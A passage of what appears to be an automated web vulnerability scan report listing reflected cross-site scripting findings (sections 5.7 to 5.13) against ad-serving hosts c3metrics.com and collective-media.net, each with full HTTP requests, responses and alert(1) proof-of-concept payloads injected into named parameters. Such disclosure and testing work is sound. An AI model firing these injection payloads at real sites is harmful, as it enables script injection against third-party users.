GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=626e5<script>alert(1)</script>369e577d9c6&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:16:17 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:16:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-16-17_2383504941305126977; expires=Mon, 09-May-2016 15:16:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_2383504941305126977; expires=Wed, 11-May-2011 15:31:17 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='2383504941305126977';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='626e5<script>alert(1)</script>369e577d9c6';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 1a3b7<script>alert(1)</script>6f68b5810d4 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4801a3b7<script>alert(1)</script>6f68b5810d4&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s6; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4801a3b7<script>alert(1)</script>6f68b5810d4&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload f12d7<script>alert(1)</script>defaeb0ad4c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverf12d7<script>alert(1)</script>defaeb0ad4c&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s7; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverf12d7<script>alert(1)</script>defaeb0ad4c&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 928ea<script>alert(1)</script>06108abd815 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72928ea<script>alert(1)</script>06108abd815 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:42 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s3; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72928ea<script>alert(1)</script>06108abd815&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76df3'-alert(1)-'943c1c41cbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.21776df3'-alert(1)-'943c1c41cbf/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:22 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:22 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.21776df3'-alert(1)-'943c1c41cbf/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAA
...[SNIP]...

5.11. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28fe5'-alert(1)-'13086d8c9b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.217/L3_549031128fe5'-alert(1)-'13086d8c9b3;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:26 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:26 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.217/L3_549031128fe5'-alert(1)-'13086d8c9b3;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAA
...[SNIP]...

5.12. http://a.collective-media.net/adj/bzo.217/L3_5490311 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7b9a'-alert(1)-'41a1dc728ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.217/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989&d7b9a'-alert(1)-'41a1dc728ee=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:11 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:11 GMT
Content-Length: 1085

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989&d7b9a'-alert(1)-'41a1dc728ee=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

5.13. http://a.collective-media.net/adj/bzo.217/L3_5490311 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62127'-alert(1)-'b24762db86e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.217/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=130512598962127'-alert(1)-'b24762db86e HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
